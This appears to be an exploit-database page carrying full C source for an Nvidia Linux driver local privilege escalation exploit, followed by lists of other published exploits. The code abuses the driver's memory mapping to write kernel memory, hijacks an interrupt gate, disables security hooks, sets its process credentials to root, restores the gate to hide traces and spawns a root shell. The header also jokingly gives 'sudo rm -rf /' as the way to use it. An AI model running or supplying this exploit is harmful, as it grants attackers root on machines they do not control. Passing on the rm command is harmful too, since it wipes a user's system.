Menu

Search for hundreds of thousands of exploits

"Nvidia Linux Driver - Local Privilege Escalation"

Author

Exploit author

anonymous

Platform

Exploit platform

linux

Release date

Exploit published date

2012-08-02

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
/* Anonymous
 *
 * How to use: sudo rm -rf /
 *
 * greetz: djrbliss, kad, Ac1dB1tch3z, nVidia!
 *
 * Only complete fix patch nvidia drivers and redefine
 * IS_BLACKLISTED_REG_OFFSET:

#define IS_BLACKLISTED_REG_OFFSET(nv, offset, length) 1

 */

#define _GNU_SOURCE
#include <fcntl.h>
#include <sys/sysinfo.h>
#include <stdint.h>
#include <inttypes.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <linux/inet_diag.h>
#include <string.h>
#include <sys/mman.h>
#include <errno.h>
#include <netinet/in.h>
#include <dirent.h>

#ifdef __x86_64__
#define KERNEL_BASE 0xffffffff80000000L
#else
#define KERNEL_BASE 0xc0000000
#endif

#define ENTRY 0xdc

#define inline __attribute__((always_inline))
#ifdef __x86_64__
#define __kernel
#else
#define __kernel __attribute__((regparm(3)))
#endif
#define __used __attribute((used))

static unsigned long kernel_ofs_phys;
static volatile uint32_t *cve_2012_YYYY;

static void poke_byte(volatile uint32_t *m, uint32_t ofs, uint8_t val)
{
  uint32_t i = (ofs & 3) * 8;
  ofs >>= 2;
  m[ofs] = (m[ofs] & ~(0xff << i)) | (val << i);
}

static void physread16(volatile uint32_t *m, uint32_t target, uint32_t *buffer)
{
  if (1) {
    uint32_t ofs = (target & 0x3ffff)/4, i;

    if (target & 0xf) {
      printf("[ ] Function requires 16-byte alignment for input!\n");
      exit(-1);
    }

    cve_2012_YYYY[0xf00/4] = 0xb | ((target >> 18) << 10);
    memset(buffer, 0, 16);
    for (i = 0; i < 4; ++i) {
      uint32_t shift = i * 8;
      poke_byte(cve_2012_YYYY, 0x204, i);
      buffer[0] |= (m[ofs/4] & 0xff) << shift;
      buffer[1] |= ((m[ofs/4] & 0xff00) >> 8) << shift;
      buffer[2] |= ((m[ofs/4] & 0xff0000) >> 16) << shift;
      buffer[3] |= ((m[ofs/4] & 0xff000000) >> 24) << shift;
    }
  }
}

static void physwrite16(volatile uint32_t *m, uint32_t target, uint32_t *buffer)
{
  if (1) {
    uint32_t i, ofs = (target & 0x3ffff)/4;
    if (target & 0xf) {
      printf("[ ] Function requires 16-byte alignment for output!\n");
      exit(-1);
    }

    cve_2012_YYYY[0xf00/4] = 0xb | ((target >> 18) << 10);

    for (i = 0; i < 4; ++i) {
      int shift = 8 * i;
      uint32_t val;
      poke_byte(cve_2012_YYYY, 0x102, 1<<i);
      val = (buffer[0] >> shift) & 0xff;
      val |= ((buffer[1] >> shift) & 0xff) << 8;
      val |= ((buffer[2] >> shift) & 0xff) << 16;
      val |= ((buffer[3] >> shift) & 0xff) << 24;
      m[ofs/4] = val;
    }
  }
}

unsigned long virt2phys(unsigned long addr)
{
  unsigned long phys;
  addr &= ~KERNEL_BASE;
  addr += kernel_ofs_phys;
  phys = addr & 0xffffffff;
  return phys;
}

// dest has to be 16-byte and slightly larger for unaligned reads
void *kernel_read(volatile uint32_t *m, void *dest, unsigned long src, unsigned long len)
{
  uint32_t rem, phys = virt2phys(src);
  void *ret = dest + (src & 0xf);

  rem = (-phys) & 0xf;
  if (rem) {
    physread16(m, phys & ~0xf, dest);
    dest += 0x10;
    phys += rem;
    if (len > rem)
      len -= rem;
    else
      len = 0;
  }

  for (; len; phys += 0x10, dest += 0x10, len -= len >= 16 ? 16 : len)
    physread16(m, phys, dest);

  return ret;
}

void kernel_write(volatile uint32_t *m, unsigned long dest, unsigned long src, unsigned long len)
{
  uint32_t phys;
  unsigned long remaining, towrite, i;

  phys = virt2phys(dest);

  if (!m || m == MAP_FAILED)
    puts("not actually writing...");

  if (1) {
    remaining = len;
    for (i = 0; i < len; i += 16) {
      uint32_t buffer[4];
      if (remaining < 16)
        physread16(m, phys + i, (uint32_t*)buffer);
      towrite = remaining > 16 ? 16 : remaining;
      memcpy(buffer, (void*)(src + i), towrite);
      physwrite16(m, phys + i, (uint32_t*)buffer);
      remaining -= 16;
    }
  }
}

static void mode_x(volatile uint32_t *x) {
  // http://wiki.osdev.org/VGA_Hardware Mode X

  // 3c0
  x[0x310/4] = 0x000f0041;
  x[0x314/4] = 0;

  // 3c2
  x[0x000/4] = 0xe3;

  // 3c4
  x[0x100/4] = 0x000f0103;
  x[0x104/4] = 0x06;

  // 3ce
  x[0x204/4] = 0x0f054000;

  // 3d4
  x[0x400/4] = 0x82504f5f;
  x[0x404/4] = 0x3e0d8054;
  poke_byte(x, 0x408, 0);
  poke_byte(x, 0x409, 0x41);
  x[0x410/4] = 0x28dfacea;
  x[0x414/4] = 0xe306e700;
}

static int dirfilter(const struct dirent *d) {
  return d->d_type == DT_LNK && strchr(d->d_name, ':');
}

static int nvidia_fd(uint64_t *res) {

  struct dirent **list;
  int fd, resfd, ret;
  char buf[256];
  ret = scandir("/sys/bus/pci/drivers/nvidia", &list, dirfilter, versionsort);
  if (ret <= 0)
    goto fail;
  sprintf(buf, "/sys/bus/pci/drivers/nvidia/%s/resource", list[0]->d_name);
  resfd = open(buf, O_RDONLY);
  if (resfd < 0)
    goto fail;
  read(resfd, buf, sizeof(buf));
  *res = strtoll(buf, NULL, 16);
  close(resfd);

  if ((fd = open("/dev/nvidia0", O_RDWR)) < 0)
    goto fail;
  return fd;

fail:
  perror("COULD NOT DO SUPER SECRET HACKING STUFF, YOU ARE ON YOUR OWN!");
  *res = 0;
  return -1;
}

volatile uint32_t *nvidia_handle(int fd, uint64_t res) {
  // access 4 bytes at a time or things go weird
  volatile uint32_t *m;

  if (fd < 0)
    return MAP_FAILED;

  // I HAD TO LEARN VGA FOR THIS
  m = cve_2012_YYYY = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, fd, res + 0x619000);
  if (m != MAP_FAILED) {
    if ((m[0xf00/4] & 8) &&
        (m = mmap(NULL, 0x10000, PROT_READ|PROT_WRITE, MAP_SHARED, fd, res + 0xa0000)) != MAP_FAILED) {
      printf("[*] CVE-2012-YYYY\n");

      mode_x(cve_2012_YYYY); // put into vga mode x, ish
      
      return m;
    }
    munmap((void*)cve_2012_YYYY, 0x1000);
    m = cve_2012_YYYY = MAP_FAILED;
  }
  return m;
}

static int tasknamelen;
static char taskname[64];

extern long gettask(void);
extern long testgetroot(void);

__used __kernel extern long callsetroot(long uid, long gid);

#define FN(x) ".globl " x "\n\t.type " x ",@function\n\t" x ":\n\t.cfi_startproc\n\t"
#define END ".cfi_endproc\n\t"
asm(
".text\n\t.align 4\n\t"
FN("testgetroot")
  // AND HAVE FUN! :D
#ifdef __x86_64__
  "swapgs\n\t"
  "call getroot\n\t"
  "swapgs\n\t"
  "iretq\n\t"
#else
  "mov %fs, %edi\n\t"
  "mov $0xd8, %esi\n\t"
  "mov %esi, %fs\n\t"
  "call getroot\n\t"
  "mov %edi, %fs\n\t"
  "iretl\n\t"
#endif
END

FN("gettask")
#ifdef __x86_64__
  // Grab some offsets from system_call
  "mov $0xc0000082, %ecx\n\t"
  "rdmsr\n\t"
  "movslq %eax, %rax\n\t"

  // Fuck optional alignment, fix it by looking for
  // the start prefix of our lovely mov %gs:.. in system_call we just found
  // this will get us kernel_stack, in which most cases it means that
  // our current_task is right below it
  // This is only needed if kallsyms fails
  "1:\n\t"
  "cmpw $0x4865, 0x3(%rax)\n\t"
  "je 2f\n\t"
  "incq %rax\n\t"
  "jmp 1b\n\t"
  "2:\n\t"

  "movl 17(%rax), %edx\n\t"

  // blegh padding
  "3:\n\t"
  "addl $8, %edx\n\t"
  "movq %gs:(%edx), %rax\n\t"
  "test %eax, %eax\n\t"
  "jz 3b\n\t"
  "cmpl $-1, %eax\n\t"
  "je 3b\n\t"
#else
  // TODO: maybe..
  "xor %eax, %eax\n\t"
#endif
  "ret\n\t"
END

#define S2(x) #x
#define S1(x) S2(x)

FN("callsetroot")
#ifdef __x86_64__
  "int $" S1(ENTRY) "\n\t"
#else
  "push %edi\n\t"
  "push %esi\n\t"
  "int $" S1(ENTRY) "\n\t"
  "pop %esi\n\t"
  "pop %edi\n\t"
#endif
  "ret\n\t"
END

".previous");

struct kallsyms {
  unsigned long *addresses;
  unsigned long num_syms;
  unsigned char *names;
  unsigned long *markers;

  unsigned char *token_table;
  unsigned short *token_index;
};

// Memory layout kallsyms, all pointer aligned:
// unsigned long addresses[num_kallsyms]
// unsigned long num_kallsyms
// unsigned char names[..]
// unsigned long markers[(num_kallsyms + 0xff) >> 8] = { 0, ... }
// char token_table[var...] = { null terminated strings }
// unsigned short token_index[var?...] = { 0, ... };

// This should probably work for 64-bits and 32-bits kernels
// But only tested on 64-bits kernels
inline static long init_kallsyms(struct kallsyms *ks)
{
  unsigned long start = KERNEL_BASE + 0x1000000L;
  unsigned long *max = (void*)KERNEL_BASE + 0x2000000L;
  unsigned long *cur;
  for (cur = (void*)start; cur < max; cur += 2) {
    if (*cur == start &&
        (cur[1] == start || cur[-1] == start))
      goto unwind;
  }
  return -1;

unwind:
  while ((cur[0] & KERNEL_BASE) == KERNEL_BASE)
    cur++;
  ks->addresses = cur - *cur;
  ks->num_syms = *(cur++);
  ks->names = (unsigned char*)cur;
  do { cur++; } while (*cur);
  ks->markers = cur;
  cur += (ks->num_syms + 0xff) >> 8;
  ks->token_table = (unsigned char*)cur;
  // Zero terminated string can create padding that could
  // be interpreted as token_index, requiring the || !*cur
  do { cur++; } while (*(unsigned short*)cur || !*cur);
  ks->token_index = (unsigned short*)cur;
  return (long)ks->num_syms;
}

#define KSYM_NAME_LEN 128
inline static int kstrcmp(const char *x, const char *y)
{
  for (;*x == *y; x++, y++)
    if (!*x)
      return 0;
  return -1;
}

/*
 * kallsyms.c: in-kernel printing of symbolic oopses and stack traces.
 *
 * Rewritten and vastly simplified by Rusty Russell for in-kernel
 * module loader:
 *   Copyright 2002 Rusty Russell <rusty@rustcorp.com.au> IBM Corporation
 *
 * ChangeLog:
 *
 * (25/Aug/2004) Paulo Marques <pmarques@grupopie.com>
 *      Changed the compression method from stem compression to "table lookup"
 *      compression (see scripts/kallsyms.c for a more complete description)
 */

inline static unsigned int kallsyms_expand_symbol(struct kallsyms *ks, unsigned int off, char *result)
{
  int len, skipped_first = 0;
  const unsigned char *tptr, *data;

  /* Get the compressed symbol length from the first symbol byte. */
  data = &ks->names[off];
  len = *data;
  data++;

  /*
   * Update the offset to return the offset for the next symbol on
   * the compressed stream.
   */
  off += len + 1;

  /*
   * For every byte on the compressed symbol data, copy the table
   * entry for that byte.
   */
  while (len) {
    tptr = &ks->token_table[ks->token_index[*data]];
    data++;
    len--;

    while (*tptr) {
      if (skipped_first) {
        *result = *tptr;
        result++;
      } else
        skipped_first = 1;
      tptr++;
    }
  }

  *result = '\0';

  /* Return to offset to the next symbol. */
  return off;
}

inline static unsigned long kdlsym(struct kallsyms *ks, char *name)
{
  char namebuf[KSYM_NAME_LEN];
  unsigned long i;
  unsigned int off;

  for (i = 0, off = 0; i < ks->num_syms; i++) {
    off = kallsyms_expand_symbol(ks, off, namebuf);
    if (kstrcmp(namebuf, name) == 0)
      return ks->addresses[i];
  }
  return 0;
}

__used __kernel long getroot(long uid, long gid)
{
  int i;
  unsigned long cred;
  int *j = NULL;
  int k;
  char *p;
  struct kallsyms ks;
  unsigned long task_struct = 0;

  long ret = init_kallsyms(&ks);

  if (ret > 0) {
    void (*fn)(void);
    __kernel void *(*fn1)(void*);
    unsigned long task_offset;
    char fnops[] = "reset_security_ops";
    char fntask[] = "current_task";
    char fncred[] = "get_task_cred";

    // SELINUX is overrated..
    fn = (void*)kdlsym(&ks, fnops);
    if (fn) fn();

    // Get a more reliable offset to current_task if we can
    task_offset = kdlsym(&ks, fntask);
    if (task_offset)
#ifdef __x86_64__
      asm("mov %%gs:(%1), %0" : "=r"(task_struct) : "r"(task_offset));
#else
      asm("mov %%fs:(%1), %0" : "=r"(task_struct) : "r"(task_offset));
#endif
    else
      task_struct = gettask();
    if (!task_struct)
      return -4;

    fn1 = (void*)kdlsym(&ks, fncred);
    if (fn1) {
      j = fn1((void*)task_struct);
      // And decrease refcount we just increased
      asm("lock; decl (%0)" :: "r"(j));
    }
  }
  else if (!ret)
    task_struct = gettask();
  else
    return -ret;
  if (!task_struct)
    return -5;

  // No kallsyms or no get_task_cred, manually try to find
  if (!j) {
    // all the creds are belong to us
    for (i = 0; i < 0x1000; i += sizeof(void*)) {
      p = (char *)(task_struct + i);
      for (k = 0; k < tasknamelen; k++) {
        if (p[k] != taskname[k])
          break;
      }
      if (k == tasknamelen) {
        cred = *(unsigned long *)((unsigned long)p - sizeof(unsigned long) * 2);
        j = (int *)cred;
        break;
      }
    }
    if (!j)
      return -1;
  }

  for (i = 0; i < 1000; i++, j++) {
    if (j[0] == uid && j[1] == uid && j[2] == uid && j[3] == uid &&
        j[4] == gid && j[5] == gid && j[6] == gid && j[7] == gid) {

      /* uid, euid, suid, fsuid */
      j[0] = j[1] = j[2] = j[3] = 0;

      /* gid, egid, sgid, fsgid */
      j[4] = j[5] = j[6] = j[7] = 0;

      /* ALLCAPS!!111 */
      j[10] = j[11] = 0xffffffff;
      j[12] = j[13] = 0xffffffff;
      j[14] = j[15] = 0xffffffff;

      return 0;
    }
  }
  return -2;
}

struct gdt
{
  uint16_t limit;
  uint32_t base;
}__attribute__((packed));

static unsigned long getidt()
{
  struct gdt idt;
  memset(&idt, 0x00, sizeof(struct gdt));
  asm volatile("sidt %0" : "=m"(idt));
  return idt.base | 0xFFFFFFFF00000000UL;
}

typedef struct gate_struct {
        uint16_t offset_low;
        uint16_t segment;
        unsigned ist : 3, zero0 : 5, type : 5, dpl : 2, p : 1;
        uint16_t offset_middle;
#ifdef __x86_64__
        uint32_t offset_high;
        uint32_t zero1;
#endif
} __attribute__((packed)) gate_desc;

enum {
  GATE_INTERRUPT = 0xE,
  GATE_TRAP = 0xF,
  GATE_CALL = 0xC,
  GATE_TASK = 0x5,
};

#define YES_PLEASE 3
#define PTR_LOW(x) ((unsigned long)(x) & 0xFFFF)
#define PTR_MIDDLE(x) (((unsigned long)(x) >> 16) & 0xFFFF)
#define PTR_HIGH(x) ((unsigned long)(x) >> 32)

#ifdef __x86_64__
#define __KERNEL_CS 0x10
#else
#define __KERNEL_CS 0x60
#endif

void dump_gate(gate_desc *gate)
{
#if 0
  uint16_t *p = (void *)gate;
  unsigned i;
  for (i = 0; i < sizeof(*gate) / sizeof(uint16_t); i++)
    printf("%04x\n", *p++);
#endif
}

void dump_bytes(void *desc)
{
  int i;
  for (i = 0; i < 16; ++i) {
    printf("%02x", ((char*)desc)[i]);
    if (i < 15 && (i % 4) == 3)
      printf(" ");
  }
  printf("\n");
}

static inline void pack_gate(gate_desc *gate, unsigned type, unsigned long func,
                             unsigned dpl, unsigned ist, unsigned seg)
{
  gate->offset_low = PTR_LOW(func);
  gate->offset_middle = PTR_MIDDLE(func);
  gate->segment = seg;
  gate->ist = ist;
  gate->p = 1;
  gate->dpl = dpl;
  gate->zero0 = 0;
  gate->type = type;
#ifdef __x86_64__
  gate->offset_high = PTR_HIGH(func);
  gate->zero1 = 0;
#endif
  dump_gate(gate);
}

// Test mode, not really an exploit, although it does
// show the option to forbid physical memory is useless
static int devmem_fd(void)
{
  int fd = open("/dev/mem", O_RDWR|O_SYNC);
  if (fd < 0)
    perror("/dev/mem");
  return fd;
}

void *xalloc(unsigned long len)
{
  void *ret = NULL;
  posix_memalign(&ret, 16, ((len+0xf)&~0xf) + 16);
  return ret;
}

void xfree(void *ptr)
{
  free((void*)((unsigned long)ptr & ~0xfL));
}

int main(int argc, char * argv[])
{
  volatile uint32_t *handle = NULL;
  long ret, i, found = 0;
  char *p;
  gate_desc gate, gate2[16/sizeof(gate_desc)];
  uint32_t buf[4];
  gate_desc *dp = (gate_desc*)buf;
  uint8_t data[256];
  uint64_t res = 0;

  printf("[*] IDT offset at %#lx\n", getidt());

  // syntax: --dumpmem BAR0, for debugging "cant find my kernel" issues as root
  if (argc > 2 && (!strcmp(argv[1], "-d") || !strcmp(argv[1], "--dumpmem"))) {
    res = strtoll(argv[2], NULL, 16);
    handle = nvidia_handle(devmem_fd(), res);

    for (i = 0; i < 0x4000000; i += 16) {
      physread16(handle, i, (void*)data);
      write(2, data, 16);
    }
    return 0;
  } else if (argc > 1 && (res = strtoll(argv[1], NULL, 16))) {
    handle = nvidia_handle(devmem_fd(), res);
    if (!getuid()) {
      setgid(1000);
      setuid(1000);
    }
    if (handle == MAP_FAILED)
      return -1;
    printf("[*] Dry run with /dev/mem as uid %u gid %u...\n", getuid(), getgid());
  }

  if ((p = strchr(argv[0], '/')))
    p++;
  else
    p = argv[0];
  strcpy(taskname, p);
  tasknamelen = strlen(taskname);

  if (!handle || handle == MAP_FAILED) {
    uint64_t res;
    int fd = nvidia_fd(&res);
    printf("[*] Abusing nVidia...\n");
    handle = nvidia_handle(fd, res);
    if (!handle || handle == MAP_FAILED)
      return -1;
  }

  // X86_OF_ENTRY
  unsigned long idtentry = getidt() + (2*sizeof(unsigned long)*4);
  pack_gate(&gate, GATE_INTERRUPT, KERNEL_BASE, YES_PLEASE, 0, __KERNEL_CS);

  for (i = 0; i < 256; ++i) {
    kernel_ofs_phys = i * 1024 * 1024;
    physread16(handle, virt2phys(idtentry), buf);

    // Copy offsets since we don't really care about them
    gate.offset_low = dp->offset_low;
    gate.offset_middle = dp->offset_middle;

#ifndef __x86_64__
    gate.segment = dp->segment;
    if (*(uint64_t*)&dp[1] == 0x00000000ffffffffULL) {
      printf("[X] 64-bits kernel found at ofs %lx\n", kernel_ofs_phys);
      printf("[X] Compiled for 32-bits only\n");
      continue;
    }
#endif

    if (!memcmp(&gate, dp, sizeof(*dp))) {
      printf("[*] %zu-bits Kernel found at ofs %lx\n", sizeof(void*)*8, kernel_ofs_phys);
      found = 1;
      break;
    }
  }
  if (!found) {
    printf("[X] No kernel found! >:(\n");
    return -1;
  }

  idtentry = getidt() + (2*sizeof(unsigned long)*ENTRY);
  printf("[*] Using IDT entry: %d (%#lx)\n", ENTRY, idtentry);
  physread16(handle, virt2phys(idtentry), buf);
  dump_gate(dp);

  printf("[*] Enhancing gate entry...\n");
  pack_gate(&gate, GATE_INTERRUPT, (uintptr_t)&(testgetroot), YES_PLEASE, 0, __KERNEL_CS);
  kernel_write(handle, idtentry, (unsigned long)&gate, sizeof(gate));
  physread16(handle, virt2phys(idtentry), (uint32_t*)gate2);
  if (memcmp(&gate, gate2, sizeof(gate))) {
    printf("[ ] Failed!\n");
    return -1;
  }

  printf("[*] Triggering payload...\n");
  ret = callsetroot(getuid(), getgid());
  // And restore old one, I'm kind like that
  printf("[*] Hiding evidence...\n");
  kernel_write(handle, idtentry, (unsigned long)dp, sizeof(*dp));
  if (ret)
    printf("callsetroot returned %lx (%li)\n", ret, ret);

  if (getuid()) {
    printf("[*] Failed to get root.\n");
    return -1;
  }

  printf("[*] Have root, will travel..\n");
  execl("/bin/bash", "sh", NULL);
  perror("/bin/bash");
  return 1;
}
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-11-27 "libupnp 1.6.18 - Stack-based buffer overflow (DoS)" dos linux "Patrik Lantz"
2020-11-24 "ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit)" webapps linux "Giuseppe Fuggiano"
2020-10-28 "PackageKit < 1.1.13 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-10-28 "aptdaemon < 1.1.1 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-10-28 "Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion" webapps linux "Ivo Palazzolo"
2020-10-28 "Blueman < 2.1.4 - Local Privilege Escalation" local linux "Vaisha Bernard"
2020-09-11 "Gnome Fonts Viewer 3.34.0 - Heap Corruption" local linux "Cody Winkler"
2020-07-10 "Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution" remote linux SpicyItalian
2020-07-06 "Grafana 7.0.1 - Denial of Service (PoC)" dos linux mostwanted002
Release Date Title Type Platform Author
2019-11-02 "ClamAV < 0.102.0 - 'bytecode_vm' Code Execution" local linux anonymous
2019-09-23 "vBulletin 5.0 < 5.5.4 - Unauthenticated Remote Code Execution" webapps php anonymous
2018-03-05 "Memcached 1.5.5 - 'Memcrashed' Insufficient Control Network Message Volume Denial of Service (1)" dos linux anonymous
2017-12-25 "Huawei Router HG532 - Arbitrary Command Execution" webapps hardware anonymous
2017-12-15 "Linux kernel < 4.10.15 - Race Condition Privilege Escalation" local linux anonymous
2017-12-11 "Linux Kernel - 'mincore()' Heap Page Disclosure (PoC)" dos linux anonymous
2017-12-11 "Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2)" dos linux anonymous
2017-12-11 "Linux Kernel 4.13 (Debian 9) - Local Privilege Escalation" local linux anonymous
2015-04-13 "ProFTPd 1.3.5 - File Copy" remote linux anonymous
2014-11-24 "Microsoft Windows 8.1/ Server 2012 - 'Win32k.sys' Local Privilege Escalation (MS14-058)" local windows anonymous
2014-03-04 "WordPress Plugin Relevanssi - 'category_name' SQL Injection" webapps php anonymous
2014-01-01 "Apache Libcloud Digital Ocean API - Local Information Disclosure" local linux anonymous
2013-09-23 "Blue Coat ProxySG 5.x and Security Gateway OS - Denial of Service" dos linux anonymous
2013-09-07 "WordPress Plugin Event Easy Calendar - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php anonymous
2013-05-07 "MyBB Game Section Plugin - 'games.php' Multiple Cross-Site Scripting Vulnerabilities" webapps php anonymous
2013-04-24 "WordPress Plugin WP Super Cache - PHP Remote Code Execution" webapps php anonymous
2013-04-15 "Linux Kernel 3.2.1 - Tracing Multiple Local Denial of Service Vulnerabilities" dos linux anonymous
2013-04-05 "Apache Subversion 1.6.x - 'mod_dav_svn/lock.c' Remote Denial of Service" dos linux anonymous
2013-04-04 "Mozilla Firefox - Cookie Verification Denial of Service" dos multiple anonymous
2013-04-04 "Google Chrome - Cookie Verification Denial of Service" dos multiple anonymous
2013-04-03 "C2 WebResource - 'File' Cross-Site Scripting" webapps asp anonymous
2013-01-21 "F5 Networks BIG-IP - XML External Entity Injection" remote hardware anonymous
2013-01-21 "GNU Coreutils 'sort' Text Utility - Local Buffer Overflow" local linux anonymous
2012-11-09 "ESRI ArcGIS for Server - 'where' SQL Injection" webapps multiple anonymous
2012-08-27 "IBM Rational ClearQuest 8.0 - Multiple Vulnerabilities" webapps php anonymous
2012-08-02 "Nvidia Linux Driver - Local Privilege Escalation" local linux anonymous
2012-08-02 "Mahara 1.4.1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities" webapps php anonymous
2012-06-17 "MediaWiki 1.x - 'uselang' Cross-Site Scripting" webapps php anonymous
2012-06-13 "SPIP 2.x - Multiple Cross-Site Scripting Vulnerabilities" webapps php anonymous
2012-05-17 "Atlassian Tempo 6.4.3 / JIRA 5.0.0 / Gliffy 3.7.0 - XML Parsing Denial of Service" dos jsp anonymous
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.